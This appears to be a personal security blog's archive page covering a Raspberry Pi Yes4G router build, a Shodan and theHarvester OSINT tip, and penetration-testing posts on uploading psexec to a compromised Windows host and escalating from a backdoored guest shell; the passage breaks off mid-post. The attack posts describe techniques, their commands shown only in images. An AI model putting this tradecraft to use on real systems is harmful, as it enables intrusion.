<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06qI-jVPMe-bAR35ozF-vlTsBKY9yCTc3HxYx41hJeZB8ibPSq0AOF9LAKoQ0zbrZ0ltfz6FILB78k-3VE7RBO2h-q25QomVj8bq6BRwLnehPvhejprb_gCaKOlj-9BnYBVLkYWiHXvDF/s1600/10001514_10202971368500592_1336721922_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj06qI-jVPMe-bAR35ozF-vlTsBKY9yCTc3HxYx41hJeZB8ibPSq0AOF9LAKoQ0zbrZ0ltfz6FILB78k-3VE7RBO2h-q25QomVj8bq6BRwLnehPvhejprb_gCaKOlj-9BnYBVLkYWiHXvDF/s1600/10001514_10202971368500592_1336721922_n.jpg" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Everything works perfectly. You can see Wifi is turned off, and of course I didn't have any SIM card.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZUQr8dQ8mmeyOgvuDcpHSteSPB9lf3rJUlBkg7RFWNftgG7jSnQmW7WvZ80K54c7xqv2mv5Im6QGkgZBxkJebQRtFJ0WkigJZciuSCn2d3iT-EDIU72TrPyhqTUtPZ7n2eaKB9GD7m6r2/s1600/Screenshot_2014-03-18-18-47-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZUQr8dQ8mmeyOgvuDcpHSteSPB9lf3rJUlBkg7RFWNftgG7jSnQmW7WvZ80K54c7xqv2mv5Im6QGkgZBxkJebQRtFJ0WkigJZciuSCn2d3iT-EDIU72TrPyhqTUtPZ7n2eaKB9GD7m6r2/s1600/Screenshot_2014-03-18-18-47-51.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
The USB device is detected correctly and interpreted as a modem instead of mass storage.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiolrwJ99r6kcFstqQHxpoKCBEV-JFwMCwKcSUC-o5Ym6C-5B_hZ1h31974FJYjezJb7gAKu0uZUP_TaeLLhJrccc8S2mfDtncvR_-AX4S7rNKWbTFliBFQaxWjLYBFj6lriGqSSNlW3I9H/s1600/Screenshot_2014-03-18-19-08-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiolrwJ99r6kcFstqQHxpoKCBEV-JFwMCwKcSUC-o5Ym6C-5B_hZ1h31974FJYjezJb7gAKu0uZUP_TaeLLhJrccc8S2mfDtncvR_-AX4S7rNKWbTFliBFQaxWjLYBFj6lriGqSSNlW3I9H/s1600/Screenshot_2014-03-18-19-08-13.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
The IP is being delegated properly.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAOMfbBI-uDibHRPI5X4Jo6OPIW7r4lzR_WW2lS9nulJ4j6j1QeHJ0QFQcZKo65hjdAD7vaX3_IyCZqc_hB4iyMWf6q2A8Fhj5_kYvigR3OrH1xeL9ABnUoB1MLn10hESIiOTWYV3ksZMW/s1600/Screenshot_2014-03-18-19-20-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAOMfbBI-uDibHRPI5X4Jo6OPIW7r4lzR_WW2lS9nulJ4j6j1QeHJ0QFQcZKo65hjdAD7vaX3_IyCZqc_hB4iyMWf6q2A8Fhj5_kYvigR3OrH1xeL9ABnUoB1MLn10hESIiOTWYV3ksZMW/s1600/Screenshot_2014-03-18-19-20-20.png" height="200" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Yep, it's working..</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
P/S: This is probably the first tablet running Yes4G natively in Malaysia. Can someone submit it to the Malaysia Book of Records (do we still have that crap?) Lolz.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>To-Do List:</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>1. Make this thing cleaner.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>2. Using ScriptManager to automate stuff.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-90233678600618539802014-03-07T00:13:00.002+08:002014-03-07T02:26:55.133+08:00Poor man Yes4G Huddle.<div dir="ltr" style="text-align: left;" trbidi="on">
The Yes4G Huddle is bloody pricey. Anything that costs more than RM300 is expensive in my own device pricing schema... I do not know what the justification for that kind of price is.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuohoA___R2xw_59XO0-etNXglJ3t7gPPabQGsrNcDeA0VcOfKtrI8wgDW16v28eAjHZUC9VFPAMq1KKLQL4l58bqf9iq9GtBGDRlmDH5lIhEXgrzKOLDOLgIri8zL1l22Ydu1ltts5bwy/s1600/cekikdarah.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuohoA___R2xw_59XO0-etNXglJ3t7gPPabQGsrNcDeA0VcOfKtrI8wgDW16v28eAjHZUC9VFPAMq1KKLQL4l58bqf9iq9GtBGDRlmDH5lIhEXgrzKOLDOLgIri8zL1l22Ydu1ltts5bwy/s1600/cekikdarah.png" height="213" width="320" /></a></div>
<br />
<br />
As a poor Malaysian living in terrible times, what should I do? Relying on Facebook/KingJason/politician Photoshop/news is not going to help. Time to start our simple hacks!<br />
<br />
<br />
<br />
<br />
<b>Hardware Requirement</b><br />
1. One Unit Raspberry Pi<br />
2. Yes Go Dongle<br />
3. TP-Link MR3040 portable 3G/4G router, configurable as our wifi broadcaster + portable powerbank<br />
4. 8GB Sdcard<br />
5. RJ-45 cable.<br />
6. A micro-USB cable to power up the Pi.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJuUH_iF3uoAvIJPLDpRa__yqBN0ycD-rM8Af1EMVkIc1kQSapvRYCroqZBIcdn2F1x5y7azJ2QvghzFjVYztgxyL8LUIJeSaSO6LkkQLPj8e1ao94kYSTGBLLIhxgh0QKqe7RMsveRsT/s1600/raspberry-pi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZJuUH_iF3uoAvIJPLDpRa__yqBN0ycD-rM8Af1EMVkIc1kQSapvRYCroqZBIcdn2F1x5y7azJ2QvghzFjVYztgxyL8LUIJeSaSO6LkkQLPj8e1ao94kYSTGBLLIhxgh0QKqe7RMsveRsT/s1600/raspberry-pi.jpg" height="210" width="320" /></a></div>
<br />
<b>Software Requirement</b><br />
<br />
1. Arch Linux as the OS<br />
2. <a href="https://code.google.com/p/gctwimax/">gctwimax driver</a><br />
3. dnsmasq<br />
4. iptables rules<br />
<br />
<b>Instructions</b><br />
<br />
1. Copy the Arch Linux ARM image to our SD card... If you are using Windows, you can use the <a href="http://fedoraproject.org/wiki/Fedora_ARM_Installer">Fedora ARM Installer</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://gallery.fabian-affolter.ch/albums/userpics/fedora-arm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://gallery.fabian-affolter.ch/albums/userpics/fedora-arm.png" height="127" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Compiling gctwimax should be easy.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. Configure dnsmasq.. Quite easy; in my case only 4 lines.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both; text-align: left;">
<b>no-resolv</b><br />
<b>bind-interfaces</b><br />
<b>interface=eth0</b><br />
<b>dhcp-range= 192.168.150.10,192.168.150.100</b></blockquote>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You might also need to set eth0 to a static address on the next boot. This can be accomplished by changing /etc/netctl/eth0 to static and giving it 192.168.150.1.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. <b>sysctl net.ipv4.ip_forward=1</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. Create two systemd service scripts separately. The first one launches gctwimax so that it gives us wimax0.. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
gctwimax reads its configuration from /usr/share/gctwimax/gctwimax.conf when invoked like this:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>gctwimax -C /usr/share/gctwimax/gctwimax.conf</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You need to change the following settings to the values below (the file holds your password in clear text, so keep it readable by root only):</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>cert_nv=0</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>anonymous_identity="RANDOM@yes.my"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>username="yourownusername@yes.my"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>password="yourownpassword"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. The second script loads the dnsmasq configuration. We also need an iptables rule to forward all our requests out via wimax0. This can be accomplished with MASQUERADE:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>iptables -t nat -A POSTROUTING -o wimax0 -j MASQUERADE</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. Configure the TP-Link portable router into WAN mode.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
8. You are ready!!!</div>
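<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The two systemd units from steps 5 and 6, written out as an added example (my own, not the post's files). It assumes gctwimax was installed to /usr/local/bin and runs in the foreground, that the eth0 profile was enabled with netctl, and the unit names are my choice; the commands themselves are the ones from the post.</div>

```ini
# Added example, not from the post: the two systemd units for Arch Linux ARM.
# Assumptions: gctwimax lives in /usr/local/bin and is not started with -d
# (so it stays in the foreground), the eth0 profile was enabled with
# "netctl enable eth0", and the unit names are my own choice.

# ---- /etc/systemd/system/gctwimax.service ----
[Unit]
Description=Yes4G WiMAX uplink via gctwimax (brings up wimax0)
After=network.target

[Service]
# Same invocation as in the post; systemd supervises the process directly.
ExecStart=/usr/local/bin/gctwimax -C /usr/share/gctwimax/gctwimax.conf
# If the dongle drops the link, re-dial after 5 seconds.
Restart=always
RestartSec=5

[Install]
WantedBy=multi-user.target

# ---- /etc/systemd/system/wimax-share.service ----
[Unit]
Description=Share wimax0 with eth0 clients (dnsmasq + MASQUERADE)
# Only start once the uplink unit is running, and after eth0 has its static
# 192.168.150.1 (dnsmasq uses bind-interfaces, so eth0 must already be up).
Requires=gctwimax.service
After=gctwimax.service netctl@eth0.service

[Service]
# Step 4 from the post: let the kernel route between the two interfaces.
ExecStartPre=/usr/bin/sysctl -w net.ipv4.ip_forward=1
# Step 6: NAT everything leaving via wimax0. "-C" checks whether the rule is
# already present, so restarting this unit never piles up duplicate rules.
ExecStartPre=/bin/sh -c 'iptables -t nat -C POSTROUTING -o wimax0 -j MASQUERADE 2>/dev/null || iptables -t nat -A POSTROUTING -o wimax0 -j MASQUERADE'
# Step 3: dnsmasq reads /etc/dnsmasq.conf (the 4 lines above) by default;
# -k keeps it in the foreground so systemd can track and stop it.
ExecStart=/usr/bin/dnsmasq -k
# Drop the NAT rule again when the share is stopped, so the Pi does not keep
# forwarding for eth0 clients once you turn it off.
ExecStopPost=/bin/sh -c 'iptables -t nat -D POSTROUTING -o wimax0 -j MASQUERADE 2>/dev/null || true'

[Install]
WantedBy=multi-user.target
```

Enable both with <i>systemctl enable gctwimax.service wimax-share.service</i>; stopping wimax-share.service leaves the uplink up but removes the NAT rule.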
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
How much does this cost compared to Yes Huddle?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Yes Huddle ~ <b>RM399</b></div>
<div class="separator" style="clear: both; text-align: left;">
Feeling ~ crap</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Mine:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Raspberry Pi ~ RM110</li>
<li>YesGo ~ RM40</li>
<li>TP-LINK MR3020 ~ RM99</li>
<li>Random SD card class10 ~RM16</li>
<li>Awesomeness ~ Priceless</li>
<li>Total= <b>RM265</b></li>
<li>Saved= <b>RM134</b></li>
<li>And we have HDMI output, how f**&amp;U* cool is dat?</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Screenshots of success.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFA9h0Gjvl7mZwNlZZDdCDYtjnhRCP6oivE0S7XyEAPyxdYYiYVkcr3amwfsLXB6602XBic8L3yhFTBGzTXiC1e8TFq3x9DpC1eo443CgHm20SL92R3LNKcY8mkveGwWNDaJZkiscUCD8t/s1600/photo+(4).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFA9h0Gjvl7mZwNlZZDdCDYtjnhRCP6oivE0S7XyEAPyxdYYiYVkcr3amwfsLXB6602XBic8L3yhFTBGzTXiC1e8TFq3x9DpC1eo443CgHm20SL92R3LNKcY8mkveGwWNDaJZkiscUCD8t/s1600/photo+(4).JPG" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
wimax0 is up and working correctly.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_xXDWoCszZfRyixLEdvInXSWmZRF9J5iqZ21CUmBw_YmwZYzml7yPRijj5Y5fFc3c5VA3m4pCIbnr70NXAcmsdlKWdh6Hzf70SPHhK6iuF_xPq44arNjUwIOBEFMwPr6GeAqaxTkHCIp0/s1600/photo+(5).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_xXDWoCszZfRyixLEdvInXSWmZRF9J5iqZ21CUmBw_YmwZYzml7yPRijj5Y5fFc3c5VA3m4pCIbnr70NXAcmsdlKWdh6Hzf70SPHhK6iuF_xPq44arNjUwIOBEFMwPr6GeAqaxTkHCIp0/s1600/photo+(5).JPG" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Infinite power cycle (Kidding)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvabpmu1XlkLRFqFJaxVyKXNXu_8oJVyIk63GVBAvzaMfppElvhOMjov1nwOrJimEe8omLx7OuLraOR0FZq_bgjYW1gMPiqEjLgEag00yzZHY9PEV7AUlbS3KWqClzQBy2moITGBFmABag/s1600/1623786_10202892799176408_975838911_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvabpmu1XlkLRFqFJaxVyKXNXu_8oJVyIk63GVBAvzaMfppElvhOMjov1nwOrJimEe8omLx7OuLraOR0FZq_bgjYW1gMPiqEjLgEag00yzZHY9PEV7AUlbS3KWqClzQBy2moITGBFmABag/s1600/1623786_10202892799176408_975838911_n.jpg" height="240" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Working perfectly at our secret mapley.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Room for improvement.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul style="text-align: left;">
<li>Getting a good nano wifi card to set up as a hotspot.. Cables are messy.</li>
<li>Implementing 16x2 LCD for lulz.</li>
<li>Understanding conditional systemd units. I miss SysV init, but hey, systemd is not dat bad; in fact it's easier.</li>
</ul>
<div>
I've already made a plain backup image, but unfortunately its size is 8GB, which is quite big. I'm uploading it to Mega. Once finished I'll update the link to my image here.</div>
<div>
<br /></div>
<div>
Cheers for No4G..</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Update:<br />
<br />
Here's the link for my image <a href="https://mega.co.nz/#!fQk3gSRT!eQI8e9E_51odQF2LsShzjghmA3jt6UBDi2M37EovV8c">archlinuxyes4g.bin</a><br />
<br />
<br />
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-78736458684481372632014-02-28T13:15:00.002+08:002014-02-28T13:15:48.253+08:00OSINT Tricks: Combining Shodan + The Harvester<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://code.google.com/p/theharvester/">The Harvester</a> is a good tool for data-mining enumeration during the recon/information-gathering phase. As of version 2.2a, the Harvester supports integration with <a href="http://www.shodanhq.com/">SHODAN</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1c1_Aa28BFbqRKxGfxMYs_ruOLYlMEi6X_tyHKQrNvF5_w9Y2vdry1hai9vzT3HjZtcrYdu7nY_j0T1IFgxuPpwJvlzcIk_T-I3wY361FjkL6VwyWoVZTdbT2yTHM1meeH3gO_wpb91S/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1c1_Aa28BFbqRKxGfxMYs_ruOLYlMEi6X_tyHKQrNvF5_w9Y2vdry1hai9vzT3HjZtcrYdu7nY_j0T1IFgxuPpwJvlzcIk_T-I3wY361FjkL6VwyWoVZTdbT2yTHM1meeH3gO_wpb91S/s1600/Capture.PNG" height="222" width="320" /></a></div>
<br />
In order to use SHODAN in the Harvester you need to supply the API key. This is what happens if you try to use it without supplying the SHODAN API key:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ES5IG07ggcPlaEffJ0Ve9WEf0HVxJbVYzODNpuQW4TNAVLFAzJhBlmzcUJ3X4MvzJG4vHoNSZ_uqHFfRM4M6aOcfIrN2GSvUCacWWkYScDQ9I-QoBgGNSRi45_6vLKdit5oGCWY07Xzm/s1600/Capture2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ES5IG07ggcPlaEffJ0Ve9WEf0HVxJbVYzODNpuQW4TNAVLFAzJhBlmzcUJ3X4MvzJG4vHoNSZ_uqHFfRM4M6aOcfIrN2GSvUCacWWkYScDQ9I-QoBgGNSRi45_6vLKdit5oGCWY07Xzm/s1600/Capture2.png" height="249" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
There is no proper documentation on how to supply the Shodan API key, but after reading the source code, it turns out you need to put the key in discovery/shodansearch.py (keep in mind that a key hardcoded in a source file travels with every copy of the tool you share or commit).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldhJ7dLxIdqC-BT5XQZOOcUtWOv0XRrdf_Ysan4zgZkZD44VpcWuQ3WGmWOPq_VaWY9hqwvOCQJGeDgW9aCqIVUI4sWlTHwutsU-fsv6rR6UcknuCeMiQZg75YcjG2s0zfE6d2zjcbXH3/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldhJ7dLxIdqC-BT5XQZOOcUtWOv0XRrdf_Ysan4zgZkZD44VpcWuQ3WGmWOPq_VaWY9hqwvOCQJGeDgW9aCqIVUI4sWlTHwutsU-fsv6rR6UcknuCeMiQZg75YcjG2s0zfE6d2zjcbXH3/s1600/Capture3.PNG" height="120" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
After supplying the key, the results for information gathering (or stalking) become much more useful.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fFJhRr9qNxkhAMtVXe260ckLQDQHTpLC2WPZSOYpX-aBX0iLRan3hb2XsgxJqZanyL2UtOWTs-YdZP_kvfAlnOcBaffLC04V-ZpXIugQ86uYObUUSI0xzgTJ6zh71z65bYWKHwxAcxGy/s1600/capture4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4fFJhRr9qNxkhAMtVXe260ckLQDQHTpLC2WPZSOYpX-aBX0iLRan3hb2XsgxJqZanyL2UtOWTs-YdZP_kvfAlnOcBaffLC04V-ZpXIugQ86uYObUUSI0xzgTJ6zh71z65bYWKHwxAcxGy/s1600/capture4.png" height="250" width="320" /></a></div>
<br />
<br /></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-4865819153630384661.post-45988571408839153412014-02-02T14:05:00.000+08:002014-02-02T14:32:09.827+08:00Uploading files on an interactive windows shell. Part 2 ..<div dir="ltr" style="text-align: left;" trbidi="on">
Following up on the <a href="http://y0nd13.blogspot.com/2014/01/leveraging-psexec-to-execute-privileged.html">previous post</a>: a reader asked me how on earth I got psexec uploaded onto the system in the first place. Good question.<br />
<br />
First technique, introduced by our favourite vendor of all time. That's right folks, Microsoft!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzTrXsFPU74q-UAioKukuiKhLq413jO-uBf7oXPxlfIwzO9cKR78XkUf7crlUA_sBwHmTdAkPr2yC_cRkDd4DFC7WeddkpFowxrsne8p-nxCWiJU4gaIrBSNqQYF7CtrB1vCYFqhyphenhyphenka1Z/s1600/fak1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzTrXsFPU74q-UAioKukuiKhLq413jO-uBf7oXPxlfIwzO9cKR78XkUf7crlUA_sBwHmTdAkPr2yC_cRkDd4DFC7WeddkpFowxrsne8p-nxCWiJU4gaIrBSNqQYF7CtrB1vCYFqhyphenhyphenka1Z/s1600/fak1.png" height="47" width="320" /></a></div>
<br />
If you don't believe me...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQganl2dg4AVnYVRSR1Nox-NhxV8z2NVNcU1r6WdUWrJgBtsELx_nv00u52h2ysi96zPFvdR2r6wSji6jey-hazW_-I7muqtfHnx9OaBMItIcm0p2eCZEewBul8xiQF2gixeW3qupVdatJ/s1600/fak2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQganl2dg4AVnYVRSR1Nox-NhxV8z2NVNcU1r6WdUWrJgBtsELx_nv00u52h2ysi96zPFvdR2r6wSji6jey-hazW_-I7muqtfHnx9OaBMItIcm0p2eCZEewBul8xiQF2gixeW3qupVdatJ/s1600/fak2.PNG" height="146" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Second technique. What happens if the firewall blocks SMB/WebDAV? Then we can upload it manually using a VBScript, as described by SK Chong in <a href="http://www.phrack.org/issues.html?id=7&issue=62">Phrack Issue 62</a>, section 6.b.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXA4zjaXMaAVm7Zcq8IkuszUDwcp2YIHSO2Hi_f8wmGoOWIxT9L2jEjtznRCLo3-_jGQ8KQvv28-m4btES_fBCFUvtvKoZ5eLDQd-JFx4xourX14lCn1fweA2U5npPGWr20MpIl4cZYg-s/s1600/fak3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXA4zjaXMaAVm7Zcq8IkuszUDwcp2YIHSO2Hi_f8wmGoOWIxT9L2jEjtznRCLo3-_jGQ8KQvv28-m4btES_fBCFUvtvKoZ5eLDQd-JFx4xourX14lCn1fweA2U5npPGWr20MpIl4cZYg-s/s1600/fak3.PNG" height="320" width="271" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Third technique. If we are on Windows 7/2008/8.1: hello, one-line PowerShell.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeG0wyM4vI0JcmlAY8ogIBLFnRCf1QpFNj6Vw2aKEfffsMRbTkdg8sXB0FUZI00v2aVzBZyHPvS_622jZpN3MUymZ7xlI1H1dQsFcwKVz6oKfTr2b9EFN343_MnXsnZ-dbbF0qqFl0lKYK/s1600/fak4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeG0wyM4vI0JcmlAY8ogIBLFnRCf1QpFNj6Vw2aKEfffsMRbTkdg8sXB0FUZI00v2aVzBZyHPvS_622jZpN3MUymZ7xlI1H1dQsFcwKVz6oKfTr2b9EFN343_MnXsnZ-dbbF0qqFl0lKYK/s1600/fak4.png" height="101" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
Endless imagination.</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4865819153630384661.post-69981624276351960512014-01-31T16:55:00.004+08:002014-01-31T16:59:18.278+08:00Leveraging psexec locally to execute privileged command..<div dir="ltr" style="text-align: left;" trbidi="on">
Gong Xi Fa Choy to all of you. Not really a good start to the year for me: my daughter is sick, but I need to go to Jakarta next week to teach a Digital Forensics/Anti-Forensics class. Anyway, here is another trick for using Sysinternals tools in a hackish way.<br />
<b><br /></b>
<b>Case Study</b><br />
<br />
<ol style="text-align: left;">
<li>In a social engineering campaign, you managed to pivot your way onto a Windows machine with low-privileged (guest) access.</li>
<li>You have an admin username and password, but RDP is not possible and runas doesn't work.</li>
<li>Ingress/egress firewall rules kick in, so running psexec remotely is impossible.</li>
<li>For Fun!!!!!</li>
</ol>
<div>
Suppose we backdoored a normal user's machine with a bind shell on port 4444.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
